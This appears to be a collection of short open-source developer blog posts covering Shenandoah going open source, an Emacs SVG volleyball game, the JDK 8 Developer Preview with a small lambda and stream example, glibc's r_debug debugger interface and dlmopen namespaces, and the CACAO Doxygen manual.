Because there have been many requests: yes, Shenandoah will be open source. Our plan is to propose a JEP as soon as we can, and make it an OpenJDK project if possible.


I started experimenting with Emacs’s SVG capabilities and ended up writing a game. Presenting:

Emacs Slime Volleyball!

It’s a clone of the great Slime Volleyball applet I used for IcedTeaPlugin testing.

Try it out!

Emacs Slime Volleyball Screenshot -- Gameplay
Emacs Slime Volleyball Screenshot -- Scoring a Point

The JDK 8 Developer Preview (a.k.a. Milestone 8) builds are now available!

This milestone is intended for broad testing by developers. We’ve run all tests on all Oracle-supported platforms and haven’t found any glaring issues. We’ve also fixed many of the bugs discovered since we reached the Feature Complete milestone back in June.

The principal feature of this release is Project Lambda (JSR 335), which aims to make it easier to write code for multicore processors. It adds lambda expressions, default methods, and method references to the Java programming language, and extends the libraries to support parallelizable operations upon streamed data.
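As a quick illustration (my own example, not from the announcement) of the three language features and the stream library working together:

import java.util.Arrays;
import java.util.List;

public class Jdk8Preview {
    // A default method: an interface method with a body.
    interface Greeter {
        String name();
        default String greeting() { return "Hello, " + name(); }
    }

    public static void main(String[] args) {
        // A lambda expression implementing the functional interface.
        Greeter duke = () -> "Duke";
        System.out.println(duke.greeting());            // Hello, Duke

        // Streams with a method reference; parallelStream() spreads the work
        // across cores, which is the multicore angle mentioned above.
        List<String> words = Arrays.asList("lambda", "default", "stream");
        int totalLength = words.parallelStream()
                               .map(String::length)     // method reference
                               .reduce(0, Integer::sum);
        System.out.println(totalLength);                // 19
    }
}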

There are, of course, many other new features, including a new Date and Time API (JSR 310), Compact Profiles, the Nashorn JavaScript Engine, and even some anti-features such as the removal of the Permanent Generation from the HotSpot virtual machine. A complete list of new features is available on the JDK 8 Features page.

If you’ve been watching JDK 8 evolve from afar then now is an excellent time to download a build and try it out—the sooner the better! Let us know if your existing code doesn’t compile and run correctly on JDK 8, if it runs slower than before, if it crashes the JVM, or if there are any remaining design issues in the new language and API features.

We’ll do our best to read, evaluate, and act on all feedback received via the usual bug-reporting channel between now and the end of October. After that we’ll gradually ramp down the rate of change in order to stabilize the code, so bugs reported later on might not get fixed in time for the GA release.

I’ve been trying to figure out how to get information about libraries loaded with dlmopen out of glibc‘s runtime linker and into GDB.

The current interface uses a structure called r_debug that’s defined in link.h. If the executable’s dynamic section has a DT_DEBUG element, the runtime linker sets that element’s value to the address where this structure can be found. I tried to discover where this interface originated, but I didn’t get very far. The only mention of it I found anywhere in any standard is in the System V Application Binary Interface, where it says:

If an object file participates in dynamic linking, its program header table will have an element of type PT_DYNAMIC. This “segment” contains the .dynamic section. A special symbol, _DYNAMIC, labels the section…

and later:

DT_DEBUG
This member is used for debugging. Its contents are not specified for the ABI; programs that access this entry are not ABI-conforming.

No help there then. In glibc, r_debug looks like this:

struct r_debug
{
  int r_version;              /* Version number for this protocol.  */

  struct link_map *r_map;     /* Head of the chain of loaded objects.  */

  /* This is the address of a function internal to the run-time linker,
     that will always be called when the linker begins to map in a
     library or unmap it, and again when the mapping change is complete.
     The debugger can set a breakpoint at this address if it wants to
     notice shared object mapping changes.  */
  ElfW(Addr) r_brk;
  enum
    {
      /* This state value describes the mapping change taking place when
         the `r_brk' address is called.  */
      RT_CONSISTENT,          /* Mapping change is complete.  */
      RT_ADD,                 /* Beginning to add a new object.  */
      RT_DELETE               /* Beginning to remove an object mapping.  */
    } r_state;

  ElfW(Addr) r_ldbase;        /* Base address the linker is loaded at.  */
};

With glibc, r_version == 1. At least some versions of Solaris have r_version == 2, and when this is the case there are three extra fields, r_ldsomap, r_rdevent, r_flags. GDB uses r_ldsomap if r_version == 2; the other two seem to be the interface with librtld_db. That’s not documented anywhere to my knowledge, and may not even be fixed: applications are supposed to use the external interface to librtld_db as documented here.

Here is the problem: r_debug, as it stands, has no way to access more than one namespace. The objects in r_map are the default namespace, directly linked, or opened with dlopen, or opened with dlmopen with lmid set to LM_ID_BASE. The r_ldsomap field in Solaris’s r_debug gives access to the linker’s namespace, opened with dlmopen with lmid set to LM_ID_LDSO, but you still can’t see any other namespaces.

glibc uses multiple r_debug structures internally, one per namespace. It would be trivial to add a “next r_debug” link to r_debug if it were possible to extend the structure, but to do this you’d need to set r_version > 2. Applications could arguably expect a runtime linker with r_version > 2 to support the version 2 interface in full, but it wouldn’t be possible to do that in glibc without reverse engineering Solaris’s implementation. glibc is therefore stuck at r_version == 1, and the r_debug structure is effectively immutable for all time.

As of earlier today, the CACAO Doxygen Manual is online: http://c1.complang.tuwien.ac.at:8010/doxygen/

The manual is intended for CACAO developers and everyone who is interested in CACAO internals. Most comments are not yet Doxygen-ready, but things are improving with every commit. In the end, publishing this manual should also have the side effect of making developers aware of and care about Doxygen documentation ;).

The pages are regenerated nightly by our Buildbot using the latest sources from the staging repository.